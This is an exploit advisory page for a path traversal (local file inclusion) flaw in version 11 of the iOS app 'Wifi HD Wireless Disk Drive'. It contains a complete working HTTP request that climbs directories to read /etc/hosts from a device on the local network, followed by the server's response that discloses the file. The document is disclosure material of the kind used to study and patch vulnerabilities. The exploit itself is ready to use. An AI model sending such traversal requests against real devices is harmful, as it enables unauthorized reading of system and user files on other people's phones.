Wifi HD Wireless Disk Drive 11 Local File Inclusion

2022.09.06
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

# Exploit Title: Wifi HD Wireless Disk Drive Local File Inclusion # Date: Aug 13, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: http://www.savysoda.com # Software Link: https://apps.apple.com/us/app/wifi-hd-wireless-disk-drive/ id311170976 # Version: 11 # Tested on: iPhone OS 15_5 GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 Host: 192.168.1.100 Connection: close Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/604.1 Referer: http://192.168.1.103/ Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate ----------------- HTTP/1.1 200 OK Content-Disposition: attachment Content-Type: application/download Content-Length: 213 Accept-Ranges: bytes Date: Sat, 13 Aug 2022 03:33:30 GMT ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top